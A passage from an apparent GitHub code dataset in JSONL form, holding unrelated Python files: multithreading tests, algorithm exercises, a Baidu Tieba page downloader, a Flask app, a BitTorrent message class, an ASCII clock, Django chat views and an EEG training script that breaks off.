MinimalResource(**version_group)\n self.names = [Name(**name) for name in names]\n","repo_name":"beastmatser/aiopokeapi","sub_path":"src/aiopoke/objects/resources/games/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"41"} +{"seq_id":"73435701564","text":"import unittest\nimport types\nfrom utils import *\nfrom LazyScripts.LazyMultithread import *\n\n\nclass multithreadedTest(unittest.TestCase):\n\n def test_multithread(self):\n results = multithread(multithread_test, [[1, 2, 3], [4, 5, 6]])\n self.assertTrue(results)\n results = multithread(multithread_test, [[1, 2, 3], [4, 5, 6]],\n chunksize=2, maxtasksperchild=2)\n self.assertTrue(results)\n\n def test_safe_multithread(self):\n results = safe_multithread(multithread_test, [[1, 2, 3], [4, 5, 6]])\n self.assertTrue(results)\n results = safe_multithread(multithread_test, [[1, 2, 3], [4, 5, 6]],\n chunksize=2)\n self.assertTrue(results)\n\n def test_multithread_failsafe(self):\n results = multithread_failsafe(multithread_test,\n [[1, 2, 3], [4, 5, 0]], verbose=True)\n print(type(results), results)\n results = list(results)\n self.assertTrue(results)\n self.assertTrue(len(results) == 1)\n results = multithread_failsafe(multithread_test,\n [[1, 2, 3], [4, 5, 0]], chunksize=2,\n verbose=False)\n results = list(results)\n self.assertTrue(results)\n self.assertTrue(len(results) == 1)\n\n def test_safe_multithread_failsafe(self):\n results = safe_multithread_failsafe(multithread_test,\n [[1, 2, 3], [4, 5, 0]],\n verbose=False)\n self.assertTrue(isinstance(results, types.GeneratorType))\n results = list(results)\n self.assertTrue(results)\n self.assertTrue(len(results) == 1)\n results = safe_multithread_failsafe(multithread_test,\n [[1, 2, 3], [4, 5, 0]],\n chunksize=2, verbose=False)\n self.assertTrue(results)\n results = list(results)\n self.assertTrue(len(results) == 1)\n\n def test_assert_yield(self):\n # self.assertTrue(False)\n results = multithread_failsafe(multithread_test,\n [[4, 5, 0], [1, 2, 3]], verbose=False)\n print(type(results), results)\n results = list(results)\n self.assertTrue(results)\n self.assertTrue(len(results) == 1)\n print(results)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jameswenzel/LazyScripts","sub_path":"tests/test_LazyMultithread.py","file_name":"test_LazyMultithread.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"41"} +{"seq_id":"37232845184","text":"n = int(input())\ndata = [int(x) for x in input().split(' ')]\n\nmax_l = data[0]\nmax_g = data[0]\n\nfor i in range(1,n):\n max_l = max(data[i],max_l + data[i])\n max_g = max(max_g,max_l)\n\nprint(max_g)","repo_name":"wesckeley/competitive-programming","sub_path":"ucoder/1039-corredor.py","file_name":"1039-corredor.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"34732011189","text":"#Uses python3\n\n\ndef reach(adj, current):\n vertecis_visited[current] = True\n sink = True\n for vertix in adj[current]:\n if removed_vertecis[vertix]:\n pass\n elif vertecis_visited[vertix]:\n return 1\n else:\n if reach(adj, vertix) == 1:\n return 1\n if not removed_vertecis[vertix]:\n sink = False\n if sink:\n removed_vertecis[current] = True\n return 0\n\n\nif __name__ == '__main__':\n v, e = [int(x) for x in input().split()]\n vertecis_visited = [False for i in range(int(v) + 1)]\n removed_vertecis = [False for i in range(int(v) + 1)]\n conn_list = [set() for i in range(int(v) + 1)]\n for i in range(e):\n v1, v2 = [int(x) for x in input().split()]\n conn_list[v1].add(v2)\n print(reach(conn_list, 1))\n\n","repo_name":"adibl/corsera_algoritems","sub_path":"my_solutions/3-algorithms-on-graphs/2-decomposition-2/acyclicity.py","file_name":"acyclicity.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"36620945322","text":"\"\"\"\"\n*_* coding: utf-8 *_*\nauthor:蔡梦丹\ntime:2022/9/28 9:18\nfile :下午篇1.PY\n\"\"\"\"\"\nimport requests\n# 百度贴吧案例加分页\ndef tieba(url,begin_page,end_page):\n for page in range(begin_page,end_page+1):\n pn = (page-1)*50\n file_name = \"第\" +str(page) +\"页.html\"\n full_url = url +'&pn='+str(pn)\n html = load_page(full_url,file_name)\n write_page(html,file_name)\ndef load_page(url,file_name):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36'\n }\n response = requests.get(url,headers=headers)\n return response.text\ndef write_page(html,filename):\n with open(filename,mode = 'w+',encoding=\"utf-8\") as file:\n file.write(html)\nif __name__ == '__main__':\n kw = input(\"请输入你要搜索的贴吧名\")\n begin_page = int(input('请输入起始页'))\n end_page = int(input('请输入结束页'))\n url = 'http://tieba.baidu.com/f?'\n # key = {'kw': kw}\n url = url + kw\n tieba(url,begin_page,end_page)","repo_name":"hmdhub/test","sub_path":"第二周/day 3/下午篇百度贴吧的案例.py","file_name":"下午篇百度贴吧的案例.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"33279255166","text":"import pygame, time\n\nclass Dialog():\n def __init__(self, x, y , w, h, dialog):\n self.rect = pygame.Rect(x, y, w, h)\n self.dialog = dialog\n self.font = pygame.font.SysFont('Times New Roman', 20)\n self.counter = 250\n self.show = False\n \n def draw(self, var):\n pygame.draw.rect(var.screen, (150, 10, 130), self.rect)\n text = self.font.render(self.dialog, True, (255,255,255))\n var.screen.blit(text, self.rect[:2])\n self.counter -= 1\n\n\n ","repo_name":"the-lightstack/pyWeek30","sub_path":"code/dialog.py","file_name":"dialog.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"13849909798","text":"from flask import Flask, render_template, request, url_for, redirect\nfrom salary import salary_and_qol\nfrom topunis import top_unis\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods=[\"POST\", \"GET\"])\ndef main():\n if request.method == \"POST\":\n province_ = request.form[\"provinces\"]\n job_ = request.form[\"jobs\"]\n\n return redirect(url_for(\"output\", province = province_, job = job_))\n else:\n return render_template(\"index.html\")\n\n@app.route(\"/?\")\ndef output(province, job):\n #return f\"

    {job} and {province}

    \"\n topNum = 10\n [sal, qol] = salary_and_qol(province, job)\n [uni_names_, dom_tuition_, inter_tuition_] = top_unis(province, topNum)\n print(uni_names_)\n return render_template('results.html',\n province = province,\n job = job,\n sal = sal,\n qol = qol,\n uni_names = uni_names_,\n dom_tuition = dom_tuition_,\n inter_tuition = inter_tuition_,\n top_num = topNum\n )\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"benaka-achar/hackED-Binaries-UniResearch","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74637691014","text":"import math\nfrom bitarray import bitarray\n\n\nclass Message:\n \"\"\"\n This class represents a basic implementation of the Peer Wire Protocol (PWP) used by BitTorrent protocol\n to provide reliable communication methods between peers in the same P2P network\n USAGE:\n message = Message()\n message.init_bitfield()\n \"\"\"\n\n # constants\n X_BITFIELD_LENGTH = b'0000'\n X_PIECE_LENGTH = b'0000'\n\n def __init__(self):\n # A keep-alive message must be sent to maintain the connection alive if no command\n # have been sent for a given amount of time. This amount of time is generally two minutes.\n self.keep_alive = {'len': b'0000'}\n\n # The uploader cannot upload more data to the swarm. Causes could be congestion control..\n self.choke = {'len': b'0001', 'id': 0}\n\n # The uploader is ready to upload more data to the swarm.\n self.unchoke = {'len': b'0001', 'id': 1}\n\n # The downloader is interested in downloading data from the requested peer.\n self.interested = {'len': b'0001', 'id': 2}\n\n # The downloader is not interested in downloading data from the requested peer.\n self.not_interested = {'len': b'0001', 'id': 3}\n\n # The payload is a piece that has been successfully downloaded and verified via the hash.\n self.have = {'len': b'0005', 'id': 4, 'piece_index': None}\n\n # The payload is a bitfield representing the pieces that have been successfully downloaded.\n # The high bit in the first byte corresponds to piece index 0.\n # Bits that are cleared indicated a missing piece, and set bits indicate a valid and available piece.\n # Spare bits at the end are set to zero.\n # [[0,0,0,0,0,0,0,0],[1,1,1,1,1,1,1,1],[1,1,1,1,1,1,1,1]]\n self._bitfield = {'len': b'0013' + self.X_BITFIELD_LENGTH, 'id': 5, 'bitfield': []}\n # The request message is fixed length, and is used to request a block.\n # The payload contains the following information:\n # index: integer specifying the zero-based piece index\n # begin: integer specifying the zero-based byte offset within the piece\n # length: integer specifying the requested length.\n self.request = {'len': b'0013', 'id': 6, 'index': None, 'begin': None, 'length': None}\n\n # The piece message is variable length, where X is the length of the block.\n # The payload contains the following information:\n # index: integer specifying the zero-based piece index\n # begin: integer specifying the zero-based byte offset within the piece\n # block: block of data, which is a subset of the piece specified by index.\n self.piece = {'len': b'0009' + self.X_PIECE_LENGTH, 'id': 7, 'index': None, 'begin': None, 'block': None}\n\n # The payload is identical to that of the \"request\" message. It is typically used during \"End Game\"\n # The \"End Game\"\n self.cancel = {'len': b'0013', 'id': 8, 'index': None, 'begin': None, 'length': None}\n\n # The port message is sent by newer versions of the Mainline that implements a DHT tracker.\n # The listen port is the port this peer's DHT node is listening on.\n # This peer should be inserted in the local routing table (if DHT tracker is supported).\n self.port = {'index': b'0003', 'id': 9, 'listen-port': None}\n\n # Tracker requests have the following keys:\n # info_hash\n # The 20 byte sha1 hash of the bencoded form of the info value from the metainfo file.\n # This value will almost certainly have to be escaped.\n # Note that this is a substring of the metainfo file. The info-hash must be the hash of the encoded\n # form as found in the .torrent file, which is identical to bdecoding the metainfo file, extracting\n # the info dictionary and encoding it if and only if the bdecoder fully validated the input\n # (e.g. key ordering, absence of leading zeros). Conversely that\n # means clients must either reject invalid metainfo files or extract the substring directly.\n # They must not perform a decode-encode roundtrip on invalid data.\n # peer_id\n # A string of length 20 which this downloader uses as its id. Each downloader generates its own id at\n # random at the start of a new download. This value will also almost certainly have to be escaped.\n # ip\n # An optional parameter giving the IP (or dns name) which this peer is at. Generally used for the\n # origin if it's on the same machine as the tracker.\n # port\n # The port number this peer is listening on. Common behavior is for a downloader to try to listen\n # on port 6881 and if that port is taken try 6882, then 6883, etc. and give up after 6889.\n # uploaded\n # The total amount uploaded so far, encoded in base ten ascii.\n # downloaded\n # The total amount downloaded so far, encoded in base ten ascii.\n # left\n # The number of bytes this peer still has to download, encoded in base ten ascii. Note that this\n # can't be computed from downloaded and the file length since it might be a resume, and there's a\n # chance that some of the downloaded data failed an integrity check and had to be re-downloaded.\n # event\n # This is an optional key which maps to started, completed, or stopped (or empty, which is the\n # same as not being present). If not present, this is one of the announcements done at regular\n # intervals. An announcement using started is sent when a download first begins, and one using\n # completed is sent when the download is complete. No completed is sent if the file was complete\n # when started. Downloaders send an announcement using stopped when they cease downloading.\n self.tracker = {'id': 10, 'torrent_info_hash': -1, 'peer_id': -1, \"ip\": -1, 'port': -1, 'uploaded': -1,\n 'downloaded': -1, 'left': -1, 'event': -1}\n\n ############################# Bitfield Methods ####################################################\n\n def init_bitfield(self, num_pieces):\n \"\"\"\n Initializes the bitfield with predefined values\n :param num_pieces: the number of pieces defined in the .torrent file\n :return: Void\n \"\"\"\n size_bitfield = math.ceil(num_pieces / 8)\n spare_bits = (8 * size_bitfield) - num_pieces\n for i in range(size_bitfield - 1):\n piece_bitfield = bitarray(8)\n piece_bitfield.setall(0)\n self._bitfield['bitfield'].append(piece_bitfield)\n spare_piece_bitfield = bitarray(spare_bits)\n spare_piece_bitfield.setall(0)\n self._bitfield['bitfield'].append(spare_piece_bitfield)\n\n def get_bitfield(self):\n \"\"\"\n :return: the bitfield\n \"\"\"\n return self._bitfield\n\n def get_bitfield_piece(self, piece_index):\n \"\"\"\n :param piece_index:\n :return: the piece bitfield located at index 'piece_index'\n \"\"\"\n return self._bitfield['bitfield'][piece_index]\n\n def get_bitfield_block(self, piece_index, block_index):\n \"\"\"\n :param piece_index:\n :param block_index:\n :return:\n \"\"\"\n return self._bitfield['bitfield'][piece_index][block_index]\n\n def is_block_missing(self, piece_index, block_index):\n \"\"\"\n :param piece_index:\n :param block_index:\n :return: True if the block is missing. Otherwise, returns False\n \"\"\"\n if self._bitfield['bitfield'][piece_index][block_index]:\n return False\n return True\n\n def is_piece_missing(self, piece_index):\n \"\"\"\n :param piece_index:\n :return: True if the piece is missing. Otherwise, returns False\n \"\"\"\n piece = self._bitfield['bitfield'][piece_index]\n for block_index in range(len(piece)):\n if self.is_block_missing(piece_index, block_index):\n return True\n return False\n\n def next_missing_block(self, piece_index):\n \"\"\"\n :param piece_index:\n :return: the next missing block index\n \"\"\"\n piece = self._bitfield['bitfield'][piece_index]\n for block_index in range(len(piece)):\n if self.is_block_missing(piece_index, block_index):\n return block_index\n return -1\n\n def next_missing_piece(self):\n \"\"\"\n :return: the next missing piece index\n \"\"\"\n for piece_index in range(len(self._bitfield['bitfield'])):\n if self.is_piece_missing(piece_index):\n return piece_index\n return -1\n\n def set_block_to_completed(self, piece_index, block_index):\n \"\"\"\n :param piece_index:\n :param block_index:\n :return:\n \"\"\"\n self._bitfield['bitfield'][piece_index][block_index] = True\n\n # getters and setters with payload\n\n def get_have(self, payload):\n \"\"\"\n\n :param payload:\n :return:\n \"\"\"\n piece_index = payload['piece_index']\n self.have['piece_index'] = piece_index\n return self.have\n\n def get_request(self, payload):\n \"\"\"\n\n :param payload:\n :return:\n \"\"\"\n self.request['index'] = payload['index']\n self.request['begin'] = payload['begin']\n self.request['length'] = payload['begin']\n return self.request\n\n def get_piece(self, payload, len_hex=b'0009'):\n \"\"\"\n\n :param len_hex:\n :param payload:\n :return:\n \"\"\"\n self.piece['index'] = payload['index']\n self.piece['begin'] = payload['begin']\n self.piece['block'] = payload['block']\n if len_hex > b'0009':\n self.piece['len'] = len_hex\n return self.piece\n\n def get_cancel(self, payload):\n \"\"\"\n\n :param payload:\n :return:\n \"\"\"\n self.cancel['index'] = payload['index']\n self.cancel['begin'] = payload['begin']\n self.cancel['length'] = payload['length']\n return self.cancel\n\n def get_port(self, payload):\n \"\"\"\n\n :param payload:\n :return:\n \"\"\"\n self.port['listen_port'] = payload['listen_port']\n return self.port\n\n def get_tracker(self, payload):\n \"\"\"\n\n :param payload:\n :return:\n \"\"\"\n self.tracker['torrent_info_hash'] = payload['torrent_info_hash']\n self.tracker['peer_id'] = payload['peer_id']\n self.tracker['ip'] = payload['ip']\n self.tracker['port'] = payload['port']\n self.tracker['uploaded'] = payload['uploaded']\n self.tracker['downloaded'] = payload['downloaded']\n self.tracker['left'] = payload['left']\n self.tracker['event'] = payload['event']\n return self.tracker\n","repo_name":"brian-tle/csc645-networks","sub_path":"labs/lab7/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":11183,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"85287580","text":"def printTime(listOList):\r\n i = 0\r\n j = 0\r\n while(j<5):\r\n while(i= 12):\r\n if(timeList[0]>12):\r\n timeList[0]-=12\r\n timeList[0] = str(timeList[0])\r\n for i in timeList:\r\n for j in str(i):\r\n combinedList.append(numDict[j])\r\n combinedList.append(colonSplit)\r\n combinedList.pop(-1)\r\n combinedList.append(pmSplit)\r\n else:\r\n if(timeList[0] == 0):\r\n timeList[0] = 12\r\n timeList[0] = str(timeList[0])\r\n for i in timeList:\r\n for j in str(i):\r\n combinedList.append(numDict[j])\r\n combinedList.append(colonSplit)\r\n combinedList.pop(-1)\r\n combinedList.append(amSplit)\r\n else:\r\n for i in timeList:\r\n for j in str(i):\r\n combinedList.append(numDict[j])\r\n combinedList.append(colonSplit)\r\n combinedList.pop(-1)\r\n return combinedList\r\n \r\ndef changeCharacter(char):\r\n cListIterator = 0#thru each number\r\n numIterator = 0#thru each row/str in number\r\n strIterator = 0#thru each letter\r\n while cListIterator < len(cList):\r\n while numIterator < len(cList[cListIterator]):\r\n combiner = \"\"\r\n while strIterator < len(cList[cListIterator][numIterator]):\r\n if (not cList[cListIterator][numIterator][strIterator] == \" \"):\r\n combiner += char\r\n else:\r\n combiner+= cList[cListIterator][numIterator][strIterator]\r\n strIterator+=1\r\n strIterator = 0\r\n cList[cListIterator][numIterator] = combiner\r\n numIterator+=1\r\n numIterator = 0\r\n cListIterator+=1\r\n dictIterator = 0\r\n while dictIterator < 10:\r\n numDict[str(dictIterator)] = cList[dictIterator]\r\n dictIterator += 1\r\n \r\n \r\n# for num in cList:#each number\r\n # for numRow in num:#each list in number\r\n# for string in numRow:#each string in each list\r\n # combiner = \"\"\r\n # for letter in string:#each character in each string\r\n # if( not letter == \" \"):\r\n # combiner+=char\r\n # else:\r\n # combiner+=letter\r\n # numRow[numRow.find(string)] = combiner\r\n\r\ninputTime = input(\"Enter the time: \")\r\nclockType = input(\"Choose the clock type (12 or 24): \")\r\nwhile((not clockType == \"24\") and (not clockType == \"12\") ):\r\n clockType = input(\"That is not a permissable clock type... try again (12 or 24)\")\r\nfillCharacter = input(\"Enter your preferred character: \\n\")#\\n\r\nwhile ((not fillCharacter in \"abcdeghkmnopqrsuvwxyz@$&*=\") and (not fillCharacter == \"\") ):\r\n fillCharacter = input(\"Character not permitted! Try again: \\n\") #\\n\r\nif (not fillCharacter == \"\"): \r\n changeCharacter(fillCharacter)\r\nif (clockType == \"24\"):\r\n clockTypeBoolean = True\r\nelse:\r\n clockTypeBoolean = False\r\nprintTime(interpretTime(inputTime, clockTypeBoolean))\r\n \r\n \r\n ","repo_name":"VidixVici/ENGR102","sub_path":"ascii_clock.py","file_name":"ascii_clock.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5750061562","text":"def bkt(k): # k=indicele componentei curente(xk)\n\t# uneori va fi nevoie de global n, x\n\tglobal n, x, corturi, m\n\tfor v in range(1, n): # (1) trecerea pe verticala v este variabila locala, forul stie mereu unde a\n\t\t# ramas\n\t\tx[k] = v\n\t\tif k <= m and x[k] <= corturi[k]: # (2)\n\t\t\tif k == m and sum(x[1:k+1]) == n and x[1] == corturi[1]: # (3) trecerea orizontala pe DREAPTA\n\t\t\t\tprint(x[1:m+1])\n\t\t\telse:\n\t\t\t\tbkt(k+1)\n\n\nn = int(input())\nm = int(input())\ncorturi = [int(x) for x in input().split()]\ncorturi = [0] + corturi\nx = [0 for _ in range(n+1)]\nbkt(1)\n\"\"\"\n9\n3\n5 2 4\n\"\"\"\n","repo_name":"flawreen/FMI","sub_path":"Python/1/sb4.py","file_name":"sb4.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9866167929","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import Http404, HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.template.loader import render_to_string\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic import ListView, CreateView, UpdateView\nfrom django.views.generic.edit import FormMixin\nfrom django.shortcuts import get_object_or_404\n# API\nfrom rest_framework import generics, views\nfrom rest_framework.response import Response\n\nfrom users.models import ActiveUser\nfrom .forms import GroupChatForm\nfrom .models import Message, CustomUser, Thread, GroupChat, GroupChatMessage\nfrom .serializers import (GroupSerializer,\n GroupCreateSerializer,\n GroupDetailSerializer,\n MessageSerializer,\n UserSerializer,\n MessageCreateSerializer,\n UserCreateSerializer, )\nfrom rest_framework import status, permissions\n\n\n@login_required\ndef home(request):\n instance = Message()\n last_message = instance.last_message(request.user)\n unseen_message = instance.count_unseen_messages(request.user)\n all_users = sorted(CustomUser.objects.all(), key=lambda inst: inst.date_joined)[::-1]\n groups_participated = GroupChat.objects.filter(users__in=[request.user.pk])\n active_users = ActiveUser.objects.all()\n context = {\n 'title': 'Home',\n 'last_message': last_message,\n 'users': all_users,\n 'groups_participated': groups_participated,\n 'unseen_message': unseen_message,\n 'active_users': active_users,\n }\n return render(request, 'chat/room_all.html', context)\n\n\ndef get_members(group_id=None, group_obj=None, user=None):\n \"\"\" Get all participants that belong to a certain group \"\"\"\n\n if group_id:\n chat_group = GroupChat.objects.get(id=id)\n else:\n chat_group = group_obj\n\n temp_members = []\n for member in chat_group.users.values_list('name', flat=True):\n if member != user:\n temp_members.append(member)\n else:\n temp_members.append('You')\n return ', '.join(temp_members)\n\n\n@login_required\ndef room(request, group_id):\n all_groups = GroupChat.objects.all()\n for group in all_groups:\n if request.user in group.users.all():\n chat_group = GroupChat.objects.get(id=group_id)\n groups = GroupChat.objects.filter(users__in=[request.user.pk])\n group_messages = GroupChatMessage.objects.filter(room_name__in=[group_id])\n active_users = ActiveUser().current_active_users2()\n context = {\n 'chat_group': chat_group,\n 'groups': groups,\n 'group_messages': group_messages,\n 'active_users': active_users,\n 'users': CustomUser.objects.all(),\n 'members': get_members(group_obj=chat_group, user=request.user.name),\n }\n return render(request, 'chat/room_all.html', context)\n # else:\n # return HttpResponseRedirect(reverse(\"chat:unauthorized\"))\n\n\ndef unauthorized(request):\n return render(request, 'chat/unauthorized.html')\n\n\ndef new_group(request):\n if request.method == 'POST':\n form = GroupChatForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, f'You have successfully created a group!')\n return redirect('public-chat')\n else:\n form = GroupChatForm()\n return render(request, 'chat/room_all.html', {'form': form})\n\n\ndef search(request):\n context = {}\n url_parameter = request.GET.get(\"q\")\n if url_parameter:\n contacts = CustomUser.objects.filter(name__icontains=url_parameter)\n groups = GroupChat.objects.filter(users__in=[request.user.pk], room_name__icontains=url_parameter)\n else:\n contacts = CustomUser.objects.all().exclude(pk=request.user.pk)\n groups = GroupChat.objects.filter(users__in=[request.user.pk])\n context = {'contacts': contacts, 'groups': groups}\n if request.is_ajax():\n html = render_to_string(template_name='chat/search-results.html', context=context)\n data_dict = {'html_from_view': html}\n return JsonResponse(data=data_dict, safe=False)\n return render(request, \"chat/room_all.html\", context)\n\n\n# async def history(request, room_id):\n# await Tortoise.init(**settings.TORTOISE_INIT)\n# chat_message = await ChatMessage.filter(room_id=room_id).order_by('created_at').values()\n# await Tortoise.close_connections()\n#\n# return await sync_to_async(JsonResponse)(chat_message, safe=False)\n\n\nclass ChatListView(FormMixin, ListView):\n model = Thread\n template_name = 'chat/room_all.html'\n form_class = GroupChatForm\n\n def get_queryset(self):\n Thread.objects.by_user(self.request.user)\n\n def get_object(self):\n user_pub_id = self.kwargs.get('public_id')\n self.other_user = CustomUser.objects.get(public_id=user_pub_id)\n thread_obj = Thread.objects.get_or_create_personal_thread(self.request.user, self.other_user)\n if thread_obj is None:\n raise Http404\n return thread_obj\n\n def get_context_data(self, **kwargs):\n last_message = Message().last_message(self.request.user)\n \"\"\" Remember to set seen sms \"\"\"\n user_pub_id = self.kwargs.get('public_id')\n current_user = CustomUser.objects.get(public_id=user_pub_id)\n groups_participated = GroupChat.objects.filter(users__in=[self.request.user.pk])\n users = CustomUser.objects.all()\n active_user = ActiveUser().current_active_users(user_pub_id)\n for g in groups_participated:\n if self.request.user in g.users.all():\n context = {\n 'me': self.request.user.name,\n 'messages': self.get_object().message_set.all(),\n 'users': users,\n 'thread': self.get_object(),\n 'other_user': self.other_user,\n 'groups_participated': groups_participated,\n 'current_user': current_user,\n 'active_user': active_user\n }\n return context\n else:\n context = {\n 'me': self.request.user.name,\n 'messages': self.get_object().message_set.all(),\n 'users': CustomUser.objects.all(),\n 'thread': self.get_object(),\n 'other_user': self.other_user,\n 'active_user': active_user\n }\n return context\n context = {\n 'me': self.request.user.name,\n 'messages': self.get_object().message_set.all(),\n 'users': CustomUser.objects.all(),\n 'thread': self.get_object(),\n 'other_user': self.other_user,\n 'current_user': current_user,\n 'active_user': active_user\n }\n return context\n\n def post(self, request, **kwargs):\n self.object = self.get_object()\n thread = self.get_object()\n data = request.POST\n user = request.user\n text = data.get('message')\n Message.objects.create(sender=user, thread=thread, text=text)\n context = self.get_context_data(**kwargs)\n return context\n\n\nclass GroupChatCreate(CreateView):\n model = GroupChat\n template_name = 'chat/create_group.html'\n fields = '__all__'\n\n def get_context_data(self, **kwargs):\n context = super(GroupChatCreate, self).get_context_data(**kwargs)\n context['form'] = GroupChatForm(request=self.request)\n return context\n\n def form_valid(self, form):\n user = CustomUser.objects.get(pk=self.request.user.id)\n group_name = form.cleaned_data.get('room_name')\n instance = GroupChat.objects.create(room_name=group_name)\n try:\n instance.users.add(user)\n except Exception as e:\n raise e\n return redirect(\"/\")\n\n\nclass GroupChatUpdate(LoginRequiredMixin, UpdateView):\n model = GroupChat\n fields = ['room_name', 'users']\n\n def get_success_url(self):\n return reverse_lazy('public-chat', kwargs={'group_id': self.object.pk})\n\n def form_valid(self, form):\n messages.success(self.request, f'Successfully updated the task.')\n return super().form_valid(form)\n\n\n\"\"\" API Implementations \"\"\"\n\n\nclass GroupView(generics.RetrieveAPIView):\n queryset = GroupChat.objects.all()\n\n def get(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n serializer = GroupSerializer(queryset, many=True)\n return Response(serializer.data)\n\n\nclass GroupCreateView(generics.CreateAPIView):\n serializer_class = GroupCreateSerializer\n\n\nclass MessageCreateView(generics.CreateAPIView):\n serializer_class = MessageCreateSerializer\n\n\nclass GroupDetail(views.APIView):\n \"\"\" Retrieve, update or delete group object \"\"\"\n\n def get_object(self, pk):\n try:\n return GroupChat.objects.get(pk=pk)\n except GroupChat.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n group = self.get_object(pk)\n serializer = GroupDetailSerializer(group, data=request.data)\n if serializer.is_valid():\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_404_NOT_FOUND)\n\n def put(self, request, pk, format=None):\n group = self.get_object(pk)\n serializer = GroupDetailSerializer(group, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n group = self.get_object(pk)\n group.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass MessageView(generics.RetrieveAPIView):\n queryset = Message.objects.all()\n\n def get(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n serializer = MessageSerializer(queryset, many=True)\n return Response(serializer.data)\n\n\nclass MessageDetail(views.APIView):\n \"\"\" Gukurura, guhindura, no gukoresha messages in our API \"\"\"\n\n def get_object(self, pk):\n try:\n return Message.objects.get(pk=pk)\n except Message.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n message = self.get_object(pk)\n serializer = MessageSerializer(message, data=request.data)\n if serializer.is_valid():\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_404_NOT_FOUND)\n\n def put(self, request, pk, format=None):\n message = self.get_object(pk)\n serializer = MessageSerializer(message, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n message = self.get_object(pk)\n message.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass UserDetail(views.APIView):\n \"\"\" Gukurura, guhindura, no gukoresha users in our API \"\"\"\n\n def get_object(self, pk):\n try:\n return CustomUser.objects.get(pk=pk)\n except CustomUser.DoesNotExist:\n raise Http404\n\n def get(self, request, pk):\n user = self.get_object(pk)\n serializer = UserSerializer(user, data=request.data)\n if serializer.is_valid():\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_404_NOT_FOUND)\n\n def put(self, request, pk):\n user = self.get_object(pk)\n serializer = UserSerializer(user, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk):\n user = self.get_object(pk)\n user.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass UserCreateView(generics.CreateAPIView):\n queryset = CustomUser.objects.all()\n serializer_class = UserCreateSerializer\n permission_classes = (permissions.AllowAny,)\n\n\nclass AllUsers(generics.RetrieveAPIView):\n queryset = CustomUser.objects.all()\n\n def get(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n serializer = UserSerializer(queryset, many=True)\n return Response(serializer.data)\n","repo_name":"izamha/hcd-chatApp","sub_path":"chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13820758359","text":"import time\nimport os\nimport yaml\nimport torch\nimport argparse\nfrom tqdm import tqdm\nimport numpy as np\nfrom EEGNet import EEGNet_encoder\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nimport pytorch_lightning as pl\n\ndef load_data(data_path):\n \"\"\"\n Load data from data_path\n :param data_path: path to data\n :return: train_data: list of training data\n \"\"\"\n train_data = []\n for file_name in os.listdir(data_path):\n if file_name.endswith('.npy'):\n file_path = os.path.join(data_path, file_name)\n eeg_data = np.load(file_path)\n train_data.append(torch.from_numpy(eeg_data))\n return train_data\n \n\ndef main(args):\n old_time = time.time()\n\n test_id = [18, 21, 30, 64, 71, 82, 123]\n\n if os.path.isfile(args.config):\n with open(args.config, \"r\") as fd:\n config = yaml.load(fd, Loader=yaml.FullLoader)\n else:\n raise ValueError(\"Config file does not exist.\")\n\n # Load data\n num_classes = config['EEG_net']['num_classes']\n root_dir = 